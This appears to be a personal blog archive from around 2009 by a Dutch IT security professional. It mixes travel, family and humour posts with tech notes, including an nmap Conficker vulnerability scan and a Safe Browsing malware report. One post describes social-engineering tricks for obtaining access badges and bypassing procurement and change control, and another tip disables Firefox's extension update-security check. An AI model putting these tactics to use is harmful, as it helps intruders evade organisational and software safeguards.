The people behind this will not make the same mistake again. They now will get some links to and from the site, and some content, change the graphics, list some names, do some more foot work and all that jazz. They learned from the incident and will not make the same mistakes. So for the next person who gets contacted and who does some online research, it will get harder to find in dices. That is worrying and reminds me of an experiment of the people behind Fake Trust.

... completely change the way you shop!

"Remember the story about how you are going to be able to order coffee at Starbucks through the iPhone and then pay at the counter? 2 Think bigger. The new iPhone 3.0 operating system and its push notifications and the in-app commerce features and abilities to pay through your account at the iTunes store, could completely change the way you shop. As you walk into any store, you could browse information about their products, order and pay and maybe have the goods delivered to your home, without having to stand in line and all the usual hassle associated with shopping. It is like on-line ordering with the added benefit of being able to squeeze, smell, and try out the products. The rumored improved camera with autofocus enables bar-code scanning. Sit in a comfy sofa at IKEA, order it, and that’s it. You just walk out. Or you could pick the goods up as you leave."

source

How is pronounced Twitxr?

Still a little rough around the edges, but who knows.

  

Dictated but not dead

Listen, son: I am saying this as you lie asleep, one little paw crumpled under your cheek and the blond curls stickily wet on your damp forehead. I have stolen into your room alone.  Just a few minutes ago, as I sat reading my paper in the library, a stifling wave of remorse swept over me. Guiltily I came to your bedside. 

There are the things I was thinking, son: I had been cross to you. I scolded you as you were dressing for school because you gave your face merely a dab with a towel. I took you to task for not cleaning your shoes. I called out angrily when you threw some of your things on the floor. At breakfast I found fault, too. You spilled things. You gulped down your food. You put your elbows on the table. You spread butter too thick on your bread. And as you started off to play and I made for my train, you turned and waved a hand and called, "Goodbye, Daddy!" and I frowned, and said in reply, "Hold your shoulders back!" Then it began all over again in the late afternoon. 

As I came up the road I spied you, down on your knees, playing marbles. There were holes in your stockings. I humiliated you before your boyfriends by marching you ahead of me to the house. Stockings were expensive-and if you had to buy them you would be more careful! Imagine that, son, from a father! Do you remember, later, when I was reading in the library, how you came in timidly, with a sort of hurt look in your eyes? 

When I glanced up over my paper, impatient at the interruption, you hesitated at the door. "What is it you want?" I snapped. You said nothing, but ran across in one tempestuous plunge, and threw your arms around my neck and kissed me, and your small arms tightended with an affection that God had set blooming in your heart and which even neglect could not wither. And then you were gone, pattering up the stairs. 

Well, son, it was shortly afterwards that my paper slipped from my hands and a terrible sickening fear came over me. What has habit been doing to me? The habit of finding fault, of reprimanding-this was my reward to you for being a boy. It was not that I did not love you; it was that I expected too much of youth. I was measuring you by the yardstick of my own years. And there was so much that was good and fine and true in your character. The little heart of you was as big as the dawn itself over the wide hills. This was shown by your spontaneous impulse to rush in and kiss me good night. Nothing else matters tonight, son. I have come to your bedside in the darkness, and I have knelt there, ashamed! It is feeble atonement; I know you would not understand these things if I told them to you during your waking hours. But tomorrow I will be a real daddy! I will chum with you, and suffer when you suffer, and laugh when you laugh. I will bite my tongue when impatient words come. I will keep saying as if it were a ritual: "He is nothing but a boy-a little boy!" I am afraid I have visualized you as a man. Yet as I see you now, son, crumpled and weary in your cot, I see that you are still a baby. Yesterday you were in your mother's arms, your head on her shoulder. 

I have asked too much, too much.

My blog blog crashes Firefox

I can not access the page you are looking at with my most favorite browser: Firefox. It crashes Firefox v3.0.10, released April 27, 2009. 

When you search for blog crashes firefox, the second link points to a story about Rob Levin's Spinhome blog crashing FF 1.5.0.2. In 1.5.0.3 it seemed to be fixed.

For me it happens not to be FF itself, but the addon NoScript, that I can not browse without anymore.

BlackHat Europe drinks anyone?

Who's there? I know I am, I know Craig Balding is and Roelof Temmingh & Chris Bohme are, but will you?

This action packed and kick ass conference will show you where the community is at and what to expect in the [not so] near future. A -must- for IT [security] people who take their jobs serious.

Not just the presentations but the informal meeting opportunities in & out side bars and rooms make BlackHat Europe so special. It's much smaller and more intimate then Los Vegas etc. This is one important reason speakers like it here so much. Not to mention the opportunity to explore this magical city with is struck by a wave of the best weather in a loooong time.

View Larger Map

Kidney, anyone?

One of my best friends is due to get a 'new' kidney, today. Just like hosting a new service. New is relative here since the market for new grown kidneys is not that big so he gets one second hand, from his wife. Like using that compiled distributed application. While they spend time unconscious under the capable hands of one team of doctors, their 3 year old spends time at our house. Like having freelancers watching over your databases.

There is a lot of risk involved in the whole kidney transplantation deal. He will get a 'strange' organ implanted and his immune system will fight it to its or their death. Like your antiviral software battling a smartly written Trojan. To prevent this from succeeding he will be taking medication to reduce the effectiveness of his immune system, which in itself opens him up to a whole range of new dangers. Like placing a very large do not scan mask. See it as DMZ's or even extranet connectivity.

But before he gets anything, she will have to give. Like opening up your tightly secured local network. She's a healthy woman in the flowering ages and has absolutely 0 health issues. Like your internal NetWare file server. She's taking a statistically small risk, kidneys get removed and people operated by the 1.000 everyday. Like hosting your own domain. Still, statistics mean little in individual cases since either you live or you die, a rather back and white situation. Like the compromise of your network with a 0 day.

The risk person in us [we do sort of the same kinda work] made us prepare for the worst. Like a BCP for an earthquake in a country like Holland. They have officially made me guardian of the little them. I have full control over all their assets. Like having the root passwords. Just in case. You never know. The scenario of him kicking the bucket, they both not waking up and whatever other terrible scenarios have been discussed, face to face and measures have been taken to assure live will be as good as possible for friend 2.0.

What can and needs to be arranged officially has been done. A will has been made, signed and sealed. List with invites & a formal chain of command have been made. Famous last words have been written. Religious & family matters been taken into account. Everything has been encrypted and securely distributed. The key hidden in Google's cache.

We also have friends over from a country where we lived for a couple of years.

Black Hat Europe will start for me tomorrow and my youngest daughter will go on her first real school holiday trip.

Later today the operation's team leader will call me to inform me of the preliminary results and I have been assigned the task to inform the selected family members, friends & colleagues.

Unless something goes dramatically wrong: then the phone will ring earlier.

Business as usual, nothing to see here, please move on.

Safe browsing at google.com?

Google hosts a great club of smart people who do all sorts of groovy things. One of them is the "Safe BrowsingDiagnostic". You can check sites yourself to [use this]

What happened when Google visited this site?

Of the 2709 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-10, and the last time suspicious content was found on this site was on 2009-04-10.

Malicious software includes 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 8 new process(es) on the target machine.

Malicious software is hosted on 3 domain(s), including v3i9.cn/, nvi3.cn/, said7.com/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including 74.125.77.0/, said7.com/.

This site was hosted on 4 network(s) including AS15169 (GOOGLE), AS26230 (TOTTAWA), AS6130 (ADN).

browsing google.com is not a safe idea anymore!

ING Internet payment site down again

ING is not doing too well, not to say bad. Lots of hocus pocus with your [and mine] money of the past couple of years have led to the current drama unfolding. This whole 'financial turmoil' might look far away from decent people's beds but it is not.

Since 2 hours the internet site for money transfers is not working, and greets you with "Welcome Null" what a great way to show your customer something 'technical' is wrong!



When I spoke to the helldesk for normal customers the lady told me there was a power issue in Amsterdam caused by the NUON. My [former] colleages told me the power issue is in Rotterdam and the IBM mainframes & access switches went of the radar about 2 hours ago.

The largest local newspaper quoted an ING spokesperson saying "We do not know what the issue is at the moment"



All of this is not so bad if the issue happened 'any other normal day' but ING's luck or mismanagement make things look extra scary since they released a press note stating they are dropping 10 of the 12 [!!!] business units not directly related to banking.



Killing the super successful no nonsense Postbank right in the middle of the financial crisis was a bad stroke of luck, but as so often, when things start going wrong, they go very wrong. I hope for you you have taken measures that the actions of the management of this bank will not affect you and your loved ones too bad, because more news is in the making...

EDIT:
And of course things that 'go wrong' can be hilarious too. Here rally champion sjeik Mohamed Bin Sulayem in the ING sponsored F1:

Nmap to find Conficker infected hosts

Get latest nmap (4.85BETA6 at the moment of writing) from:

http://nmap.org/dist/?C=M&O=D

run:



sudo nmap -sC --script=smb-check-vulns --script-args=safe=1 -p445 \
-d -PN -n -T4 --min-hostgroup 256 --min-parallelism 64 \
-oA conficker_scan

It is important to note that scanning for Conficker has the small chance of crashing an unpatched host. Patched and infected hosts won't be crashed though. Note that if Conficker scans unpatched hosts they are even more likely to crash than with this check so the benefits probably outweigh the drawbacks.

Find the source here.

nothing.. compares... to you

It's been... seven hours... and fifteen.. days
since you took... your love away
I go out... every night... and sleep all.. day
since you took... your love away
since.. you've been gone... I can do... whatever I want
I can do... whatever.. I choose
I can eat.. my dinner.. in a fancy.. restaurant
but nothing... can take away.. these blues
nothing compares
nothing compares.. to you

It's been.. so lonely... without.. you here
like a bird... without.. a song
nothing.. can stop... these lonely tears...
tell me baby...  where did I. go wrong?
I could.. put my arms... around every girl I see
but they'd all... remind me. of you
I went.. to the doctor... guess what he.. told me
said you'd better have some fun
no matter what you do,
nothing compares
nothing compares... to you

All the flowers.. that you planted..
in the backyard
all died.... when you went.. away
I know that.. living with you.... was sometimes hard
but I'm willing.... to give it a try

nothing. compares
nothing compares... to you
nothing compares
nothing... compares... to you
nothing compares
nothing.. compares to you
nothing compares
nothing compares... to you
nothing compares
nothing.. compares... to you

Dutch Chocolate == drop

For years I have been an addict and huge fan of the best chocolates in the world that are locally produced and sold in... Amsterdam. The company is called Puccini and has two shops. One conveniently located 5 minutes cycling from my home. Luckily the route to work does not take me past that shop so we have enough money left to buy real food too.

As I am on an assignment in Istanbul, I like to bring some 'typical' dutch presents with me to break the ice and compensate for all the presents and gifts I get from my colleagues when abroad. Stroopwafels are a safe bet, no matter where you go, as long as care is taken in warm climates in regards to transportation and the stains the syrup leaves.

Much to my surprise I was offered 'dutch chocolate' today while at the coffee break. For me, Dutch chocolate == Puccini. Nice! What an excellent start of the day!

Even more surprised I was when I found that the 'Dutch chocolate' was actually drop!

Drop makes me drool [Pavlof sends his greetings] but I am not that much a fan of it, but it is fun to see how not Dutch people react to it. Like haring, it is something you have to grow up with to like.

♫♫♫ ♫♫♫ Ton Lebbink ♫♫♫ ♫♫♫

De nederlandse pop dichter Ton Lebbink is een held, tenminste, dat vind ik en een groeiend aantal andere. Ik heb natuurlijk al zijn platen, maar mijn pogingen om er fatsoenlijke mp3's van te maken zijn schromelijk mislukt. Gelukkig zijn ze te koop bij Fonos.

Nog toffer is dat veel van Ton Lebbink's werk nu ook op YouTube te vinden is om eens te luisteren voor het geval je het nog niet kent.

Boodje Brood is ook actief bezig met Ton Lebbink [en nog meer interesants].

Dus bijdeze mijn luister tip:

RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.

Dear employees,

Due to the current financial situation caused by the slowdown of the economy, Management has decided to implement a scheme to put workers of 40 years of age and above on early retirement. This scheme will be known as RAPE (Retire Aged People Early).

Persons selected to be RAPED can apply to management to be eligible for the SHAFT scheme (Special Help After Forced Termination). Persons who have been RAPED and SHAFTED will be reviewed under the SCREW programme (Scheme Covering Retired Early Workers). A person may be RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.

Persons who have been RAPED can only get AIDS (Additional Income for Dependants & Spouse) or HERPES (Half Eamings for Retired Personnel Early Severance).

Obviously persons who have AIDS or HERPES will not be SHAFTED or SCREWED any further by Management.

Persons who are not RAPED and are staying on will receive as much SHIT (Special High Intensity Training) as possible. Management has always prided itself on the amount of SHIT it gives employees. Should you feel that you do not receive enough SHIT, please bring to the attention of your Supervisor. They have been trained to give you all the SHIT you can handle.

Sincerely, The Management

Process hacking

When people I know start talking about 'hacking' in the original mean of the word [making things happen by means that it was not designed for], we most of the time stick to some technical mumbo jumbo, as the boss likes to call it.

That is something our whole industry likes to do. Did and does. No matter how many times we get bitten in the arse by people doing things wrong, we like to forget about the art of social engineering, simply because it is too difficult to do something about and because it does not sell boxes that smell nice because they are new.

I have spend quite some time working for|in|with large organizations and these are the places where social engineering works best. Employees do not know each other, low raking employees have been given a bullucking by their 'superiors' for sticking to the rules, etc.

The bigger the organization, the larger the piles of documentation with rules and exceptions. Fertile ground for those who want to get things done, their way :P

Getting access to buildings is easy, specially with the no smoking inside. Every company has a percentage of people who are addicted and these people -will- find ways to get out & in without too much hassle. Be it the emergency exit, be it a rooftop, but like water: they will find a way.

A novel trick I found lately was that after some of the smokers who used to leave via the front door but where called into the managers office after he'd seen the in-out time table, is getting a visitors pass for walking in & out unregistered. Smart. Of course I had to try to see how difficult it was to get one of those: frighteningly simple. Since so many had explained the situation with the security people, showing a packet of cigarettes was enough to trigger the knee jerk reaction of handing out a temporay access badge.

The same happens with the ordering process. Since all has been 'centralized' and 'standardized' it might take up to 6 months to get an order through [correct, this is a very bad and seldom example]. Because the supplier knows and has been trained to deliver orders before the paper work is 'completed', it is trivially simple to get any kind of hard & software shipped without passing the regular process. Most of the time the supplier will get his formalized order some time later but when he doesn't he just faxes the delivery notification to the ordering department and since they are used to things to go wrong, will send him a proforma so he will be able to bill.

More of the same is with changes to infrastructure. Since all self respecting organizations have CABs [Change Advisory Boards], where as we all know the most anal & inexperienced people waste their time, that take forever to approve the most basic changes but will happily waver changes with impact beyond the minimal description. This is how 'the insiders' get things done: there old an trusted social network.

In the role of PM or as auditor I do the same. I spend a large part of my time setting on desks, hanging around the coffee machine, lunching with [key-] people from the departments that actually do things. By constant name dropping and revering to 'john from RM', by reinforcing the well known fact that the official processes 'do not work' and 'the last reorganization undid the one before', confirming that 'the management' costs & wastes money, this way I get my rules, my connections, my targets met and implemented.

So if you get all exited when you find company xyz is still running that well knows bugged version of the Internet facing software, remember that I get the same happy feelings when I see people with ties and temporary badges :P

EDIT: Found people who actually give classes http://secinmotion.blogspot.com looks good.

Oh that thing from yesterday? It was just a tiny little bug…

You gotta love the importance of the infra and the huge dependency on everybody playing nice, or better, knowing what they are doing.

Yesterday a tiny little outlet called SUPRO, spol. s r. in the middle of nowhere called Hradiste CZ, who manage AS 47868, blacked out part of the oh so crucial Internet. This was done [for all we know] without any bad intentions but Fast Fingered Freddy did manage to cause a stir in the smooth user experience our beloved browsers are so used to.


As shown here there where a couple of countries suffering of their outdated routers but users of all countries might have traffic passing these.

A Basterd's Work is Never Done

Ah, nice! Time to get some laughs and warm feelings about 'bad' things.

The movie lifting [insider story of a friend of mine who worked over at a video rental and who told me he hired movies that he never brought back] Quentin Tarantino makes a new movie.

Chopping up Nazi's is a cool thing, in whatever way, shape or form so I am looking forward to the torrents in May :P

L’Chayalim B’Ahava!

It's easy to sit back and watch TV, read a newspaper and forget about the hardship real people have to go through to [attempt] to bring peace & safety to a young nation.

There is a simple way to express your worldly appreciation to those that do the work.

Working in IT? Read this!

Note: this is NOT written by me, you can tell, too well worded and it even makes sense. This is all written by Cormac O'Reilly and published at the world famous TheRegister.

As Sodor wakes to a new year, Thomas and his friends notice some very disturbing things...

The end of the IT world train is arriving at platform one

Cheaper hardware and software prices in 2009 means that IT becomes an increasingly throwaway business. We're there with printers, and other plug-ins: expect much the same with PCs, small servers, most storage and productivity software.

Software has gone from purchase, to rental, to free open systems and is now rapidly moving to online service. But the growing mindset is to load up on low-cost standby equipment, and scrap the original when it goes wrong. In this environment, the clever IT specialist and expensive performance monitoring tools have less and less to do.

Forget complex processor technology or clever storage solutions. Install massive redundancy of cheap commodity gear. Google pioneered this approach in building its (and the world's largest) IT infrastructure, and established that this pays big dividends and provides incredible performance. Expect this express train to arrive in 2009 and pick up more and more passengers. Don't be surprised if Google is not just the driver, but owns the railway company.

Base-line IT services hit the buffers

Talking of Google the Tank, expect a corporate flight to its Apps and productivity tools (like Gmail) in 2009.

Google has positioned itself to be in this business, just as Amazon did in running other companies' electronic shops. Many of the big corporate names have been tire kicking Google services for months. It's obvious that they are well run, highly reliable and accessible. Commodity "dial tone" services offer better quality, performance and capability that anything the traditional legacy players can supply, and make in-house provision of these services economically laughable.

Clever old Google provides ever better tools to migrate corporate services to its platform. These tools get easier to use, introduce stellar security and avoid the need for - gasp - overpaid IT people, complex software and expensive infrastructure. Expect these services to go the way of payroll. This was once a must in-house application, now it is a must outsource.

The trains leaving for Asia is loaded with bundled back office services

Expect Asian outsourcers to climb over the European and US traditional outsource players (like EDS/HP and Accenture) and in-house IT organizations, and sell directly to administrative corporate functions in 2009. They already provide the people-centric intellectual IT engines of the world. So why should they not get as much of the margin as possible?

Call centers are a thing of the past - application software maintenance is increasingly low margin, so expect pressure for bundled back office operations - that's transaction touch, rather than customer touch. I expect 2009 will be the beginning of the end of in-house IT services.

Remember, if you are not adding clear value, then you must be adding pure cost. And the tolerance for this will be thinner than atomic particles in 2009 and beyond.

I suspect few legacy IT companies or old world IT Departments are ready to cope with this uncomfortable scenario, even though they know it is on the horizon. With the global economy providing the heat, and businesses laser-focusing on cost, expect this little chemical reaction to drastically speed up 2009.

The passengers are revolting

Just about every major company funds a junkyard of application systems and technologies attached to them. Few have had the incentive to fix this, much to the consternation of corporate IT departments. Remember the IT cost justification for that ERP system - all those systems that it would replace, but somehow never did. And recognize the fact that this residue of junkyard legacy counts for a big part of the IT budget, and generates lots of operational inefficiency.

Depression-level economics will force line managers to actually take charge of this expense they unknowingly caused. Expect systems on which the company is apparently so dependent to go, and with them much of the IT junk. As a result, expect a lot of high margin break/fix work that propped up the cash flow of legacy IT companies to disappear.

The Fat Controllers lose patience

Senior managers have moved from being in awe of IT's potential, to deep disappointment at its lack of pay-off. About now, expect them to figure out that process engineering etc. needs to go - see Asian Back Office above. Once this mindset starts, expect to see a whole different senior management attitude.

Google and Microsoft, both at their core, are people productivity-centric, and will likely play a much bigger front office productivity role - look at Google's Gears and Microsoft's front office re-emphasis. Watch the gathering rush to bundle solution technology between front office (which these guys own) and back office (which Asian outsourcers will increasingly own). What's left is innovation and application - good luck with that, IT boys and girls. That's a whole different world, and one that few IT grunts have ever lived in.

Finally, the wrong kind of snow on the lines

Expect high margin networking equipment companies to fall to earth. Increasingly, when dealing with procurement departments, expect them to fail to explain that products from the likes of D-Link that cost a fraction of their price, but have the same specs, are inferior. Hey, we all know they have the same basic building block components, work to the same standards and are already at throwaway prices.

And don't expect our pals at the telephone companies to hold the line. They are up to their ass in fiber, broadband and shortly WiMax, while consumers drain the landline and traditional phone services swamp. If you don't believe it - then use Magic Jack to provide your unlimited telephone and fax services in the USA for $20 a year. YES - TWENTY BUCKS A YEAR!

And as night falls on the Island of Sodor, Thomas and his friends worry about the scrap heap....

End of the year, show me the stats!

This little vanity blog is getting at least some hits from you guys [thanks!] and I thought it would be nice to share with you what you are looking for, at least when you are using your google fu:

1. google street view amsterdam
2. mokum von amsterdam
3. amsterdam iphone
4. street view amsterdam
5. firefox fullscreen os x
6. "put your mouth where your money was"
7. google street view netherlands
8. failed keyboard-interactive/pam for invalid user
9. amsterdam street view
10. forgotten hope 2.0.rar

And from google you came:
1. google 2,257
2. yahoo 19
3. aol 17
4. search 13
5. altavista 4
6. msn 2
7. lycos 1
8. netscape 1

You love my root and it shows:
1. / 2,629
2. /2008/07/google-car-in-amsterdam-holland.html 293
3. /2008/01/sound-noise-good-neighbours.html 280
4. /2008/08/best-things-in-life-are-free.html 188
5. /2007/09/bring-it-on.html 182
6. /2008/05/ssh-brute-force-botnet.html 147
7. /2008/08/pdps-older-mailbox-volumes-compromized.html 114
8. /2008/03/firefox-fullscreen-on-osx.html 110
9. /2007/09/full-body-scan.html 99
10. /2008/07/battlefield-2-new-patch-15-and-3-new.html 86

Your tools? As expected:
1. Firefox
2. Internet Explorer
3. Safari [iPhone's I am sure]
4. Opera
5. Mozilla
6. Chrome
7. Mozilla Compatible Agent
8. Netscape
9. Camino
10. HPiPAQ910

Your OS:
1. Windows 3,340 77.19%
2. Macintosh 745 17.22%
3. Linux 175 4.04%
4. iPhone 41 0.95%
5. (not set) 14 0.32%
6. FreeBSD 5 0.12%
7. SunOS 3 0.07%
8. SymbianOS 3 0.07%
9. Nintendo Wii 1 0.02%

Hope this satisfies your never ending lust for facts & figures.

Happy birthday to you, happy birthday to me!

Blowing out candles is sooo 2007!

Mantra from the Dalai Lama

1. Take into account that great love and great achievements involve great risk.

2. When you lose, don't lose the lesson.

3. Follow the three R's:
Respect for self
Respect for others and
Responsibility for all your actions.

4. Remember that not getting what you want is sometimes a wonderful stroke of luck.

5. Learn the rules so you know how to break them properly.

6. Don't let a little dispute injure a great friendship.

7. When you realize you've made a mistake, take immediate steps to correct it.

8. Spend some time alone every day.

9. Open your arms to change, but don't let go of your values.

10. Remember that silence is sometimes the best answer.

11. Live a good, honourable life. Then when you get older and think back, you'll be able to enjoy it a second time.

12. A loving atmosphere in your home is the foundation for your life.

13. In disagreements with loved ones, deal only with the current situation. Don't bring up the past.

14. Share your knowledge. It's a way to achieve immortality.

15. Be gentle with the earth.

16. Once a year, go someplace you've never been before.

17. Remember that the best relationship is one in which your love for each other exceeds your need for each other.

18. Judge your success by what you had to give up in order to get it.

19. Approach love and cooking with reckless abandon.

A geek mind is a joy forever!

/dev/tty.PL2303-00001004
==
http://osx-pl2303.sourceforge.net/
+
Prolific PL2303 USB serial adapter

Panorama by Calico

Made possible by Calico. What a kick ass tool!

Faruk Yazicilar is king!

WOW! Was my first impression when I coincidentally walked into [read 'Paradise Lost' for some history on the name] the work of the Istanbul based artist Faruk Yazicilar.

WOW! What a strong image, such constrained but strong expressions.

I would really like to meet this man and see more of his work and if all works out: get one as a present to my beloved.

If only there was more of his work online, till the time I meet him...


And on a site note: why the sudden interest late october from telia stofa a/s, opal telecommunications internet service provider and the arts institute at bournemouth for my domains do know evil?

I want a Nixie Watch

Forget the slick and expensive gold bling bling crap!

The Nixie Watch is the real deal and the only thing one can give a true geek.

Made by a super geeky dude who is into cathodes like a tornado is into trailer parks, this watch is something I can no longer live without.

New MacBook Pro, now what?

It is the same on all new machines: it takes a while to get it look & feel like you like it most.

The patches
FireFox plus noscript & adblock
xcode
darwinports
wget
nmap
mtr
unrar
wireshark
Skype
iWork
Picasa Web Albums Uploader
Crossover
Visio
Google Earth
fugu

And then some, but by the time this is done... man!

More:
vmware
roxio toast
wow
rEFId
BackTrack

And more later.

More like:
tuntap
HandBrake

Time to go home

BU SİTEYE ERİŞİM ENGELLENMİŞTİR

Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 tarih ve 2007/1705 nolu kararı gereği bu siteye erişim TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI'nca engellenmiştir.

Access to this web site is banned by "TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI" according to the order of: Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 of 2007/1705.

---

Hip Istanbul, a hot view & good people.

So let's talk about the good stuff in Istanbul. The free people. The scene that has [a little more] money and knows where to go.

The evening started of at a friends place. He rents an apartment in the groovy district Cihangir. It has everything one could want from a [temporary] place. Lovely old paintings on the stairways, where the teeth of time have left there marks, the stains of water leaking and many a dent of all the people and goods going up and down in the never ending struggle for life and security.

The details in the apartment all tell a story or two. About the original intent and the good & the bad. The attempts to improve or to restore. All have left their traces.





Later that night I went to a place called 5.Kat [in English: the fifth floor]. What a lovely view! Great view over the Bosporus and an even better crowd. Then enters the owner: Yasemin Alkaya. She just to work as an actress and now runs one of the hottest bars|restaurants in town.

She cooks, waiters, hosts and entertains her guests with such ellegance and style that it was love at first sight for me. I will be back here, as often as I can.

Other places:
Sabahattin Fish!
Develi Kebab
Changa International
Ulus 29 see and be seen

With thanks to Erdal Gökyıldırım for his tips and comments :D

So, how was your holiday?

Put your mouth where your money was.

Be fearful when others are greedy, and be greedy when others are fearful.

How difficult a message is that? Well it seem really really difficult. The investor eveybody loves to love, Warren Buffett, is making a bundle and screaming on the top of his lungs that he does and so should you. Buy equities.

The challenges @ Dagobert Duck

Because my ties with a couple of people who work for @ at SURFnet, I accepted an invitation to do a presentation. The audience consists of mainly university students and technical employees of universities so the question was if I could share some light on the differences of working at really big companies.

I tried :P

The differences are so extreme that sometimes it seems as if our methods and challenges have no shared needs or issues. This is not true. We fight the same monsters, technically, we just have a different landscape.

Think of it like BF2 & CoD.

A fun day with some excellent content brought by very capable people so I am happy to say that these where 2 days well spend. Since this is a university environment, speakers where much more encouraged to give some juicy details, details you would normally not out with a mic in your face. The questions are of such relevance to the issues discussed and not aimed at getting quotable 'bedroom secrets' so many a PR person would feel uncomfertable with the intemicy of details exchanged.

Exectly the kind of details & environment I like and can actually use in my day to day job.

SURFnet at all: thank you!

The best baklava from Istanbul!

I love real good Baklava. The best in Istanbul you have to buy at Karakoy Gulluoglu in the Rihtum street, Karakoy. It is close to the Galata Tower.

See for yourself:

Grotere kaart weergeven

I met the founder, Mr Mustafa Gullu who started the shop and workplace in 1949. Since then not a single other shop was opened. If you want the best Baklava in Istanbul, you have to go here. No alternatives :D

Since I normally stay at the Moevenpick and it takes about 30 minutes of frantic driving throug the city. Cab driving in turkey is something that follows a few simple rules:

1. Change lanes, just because you can
2. Do NOT look to the cars in front of you
3. Keep no distance

Being a passenger means you avoid sitting next to the drivers and concentrate on anything but the traffic...

Most pathatic, hands down.

Of course picking on Microsoft has always been easy. Way too easy. So for me the laughing stock of this decenia has always been the inspired leader of Vodaphony and the AV bosses.

But MS has out done most of the attempts for gaining the top spot. Since absolutely no one wants or uses Vista, a low life MS marketing droid came up with the brilliant plan to show people Vista and not tell them it was Vista and record their happy feelings...Did not work, so plan B: get a well know dude to sell your stuff, that failed again.

That did not really work, so then they moved to the oldest trick in the book: if you can't beat them, copy them. So the market got a piece of MS interpretation of the fabulous "Hi I am a Mac, and I am a PC" commercials from Apple, but then done by Microsoft.

Now quess what? The stuff has been made on a ... MAC :D


Rock on loosers!

Hurricane Electric roxs on!

Years ago I hosted one of my servers over at Hurricane Electric [still LOVE that domain!]. At the time a small hosting company with Linux knowledge and a heart on the right spot.

The interface to the company was, well, minimal. A simple page with no 2.0 features or 1.0 features for that mater :D The service was good, even with complicated stuff like mail hosting and DNS stuff they would always have s good solution available. At times the tech guy [Mike Leber] would even ssh to my server and assist, really hands on & friendly.

Now they are the most reliable hosting company in the month August of 2008. Congratulations!

They run the tenth largest international network in the world.

Might be a nice idea to setup a total ipv6 host there...

WACHTEN OP DE WITTE RIDDER

de prinses voelt met een natte vinger
of haar strijkbout heet genoeg is
trekt haar kuisheidsgordel op
een beetje

haar witte ridder?
een rammellend harnas
een mannetje met jeuk

de prinses wacht
op de hitte van haar bout
tijd verstrijkt

-- Emma Klage

Bomb bomb bomb Iran!

All systems go! The dutch secret service has retreated all their spies from Iran and one of them informed the media that this is because the states are going to attack Iran with drones, RSN.

Coming from the Dutch secret service directly, this has to be true :P

Let's hope that at least CNN has some webcam's rolling so we can enjoy the show.

julie moult is an idiot...

...at least, that is what google gives when you search for "julie moult". The lady apparently thought she understood the concept of google bombing enough to write about it and... well, it back fired.

There are plenty people who do not like her style, her subjects and even the newspaper she writes for and of course the community loves making a point.

As one blogger puts it: Julie Moult is an idiot. And we're here to let her know.
Stealer of images (from top fellow Beau Bo d'Or) and all-round Daily Mail Hackette, Julie needs a wee lesson in the art of Googlebombing...

Google gives about 330 for "julie moult" +idiot right now. Guess that will be many more soon.
Update [14-sept-2008] 43.000 for "julie moult" +idiot right now.
Update [14-dec-2008] about 2,440 for "julie moult" +idiot

SATA Windows DVD ServicePacks :(

Since my last still standing PC is equipped with JMicron 363 SATA on board and SATA disks only, installing Windows is somewhat of a bitch since the last floppydrive left the house about 8 years ago.

XP is from the era that every machine still had a floppy drive so when you need to load an extra driver the only option you got is... supplying these drivers on a floppy.

Luckily there are more people who suffer from this handicapped feature and did something about it: nlite is the solution for XP. It enables one to easily make a slipstreamed XP image with added drivers [SATA comes to mind], Service Packs, patches, regional settings, XP key and much more.

Untill a week ago, I would rely on InfraRecorder [open source] to burn ISO's to CD's and DVD's but I noticed an issue with an ISO I had downloaded and tried to burn on a DVD: it was in CD format so the results where not what I expected. ImageBurn is much more advanced and able to convert CD format to DVD, on the fly. It does not get much easier then that.

So armed with a slipstreamed ISO, packed with SATA drivers, SP3 and then some, I booted the beast to be hit by various BSoD's... So that was my last attempt to have a pure window's machine.

Microsoft, it was good as long as it lasted but this is my final goodbye. I will still use your OS'es at times [for games & on dreaded corporate machines!] but I will not ever spend a cent on it again.

Vista might be lame to most, for me it is a bridge too far and something I am not even looking at.

Photo by algo

DNSsec as is a solution, right?

Since the latest DNS patch horror for those who _still_ use BIND over DJBDNS or OpenDNS, a lot of smart people who know a lot more about DNS then you & me together have been pointing to DNSsec as an even better cure.

DNSsec is a bitch to setup and use, even the guruus over at SANS are reluctantly and carefully touching the DNSsec waters. To actually benevit from the sec part of DNSsec, the end user would need to 'see' something like a nice big fat green thingy when connected to a DNSsec protected website, right?

Unfortunatly DNSsec is still not really widely deployed. There is no buildin firefox [or anyother browser for that matter] support.

Well for Firefox there is an extention for all your needs, to for DNSsec there is too. Called the DRILL extention. It would not install on my FF 3.0.1 since the DRILL exention ‘will not be installed because it does not provide secure updates’. Solution: go to the about page, create a new bolean called extensions.checkUpdateSecurity and set it to false. Try again & fail again: the extention does not support FF 3.x

So much for the nice effort.

KPN Internet Mobile + HuaWei + OSX == horror

GRRR!

For my MAC PowerBook A couple of months ago I bought a PCMCIA UMTS card with a KPN subscription for Mobile Internet. Costs a couple of euro but it provides me with Internet access when not being able to connect to a cable, for whatever reason.

I bought a MacBook a little later and since it does not have a PCMCIA slot, got myself a HuaWei E270 USB device to go with it. The HuaWei USB will automount, show the drivers that need to be installed and does so with all the correct settings preloaded: if one runs some sort of windows.

I do not.

Luckily KPN provides a dmg with the correct config from their website for us 'few' MAC users. Nice.

Unfortunatly my connection suffers from various problems:

• connection speed sucks: 100 KB/s toprate up & down
• HuaWeidrivers kernel panics OSX
• syslog takes up to 80[!!!] % of the CPU when beeing flooded by the HuaWei driver

Of course the KPN helpdesk offers 'solutions' that do not cut ice:

1. Use another OS [riiight!]
2. Use another machine [Ok, give me one!]
3. Have the HuaWei driver installed by a service point [it is!]

Google assistance requiered. I took a random [1 in a million :P ] syslog line "RemovefromQueue: Enter, MaciSize" and found more people who are complaining their syslog was beeing filled up by the HuaWei driver messages, unstable connections & other jazz. In the HuaWei forums people are going rampant suggesting to go wired DSL because this seems not to be resolved although the user x00114004 [who's profile claims he works at HuaWei] says he has sent the information to the R&D department. Over at the Apple Support forums it is the same. In Australia too.

Most complaints are about the E220, but some mention the E226 and mine is the E270.

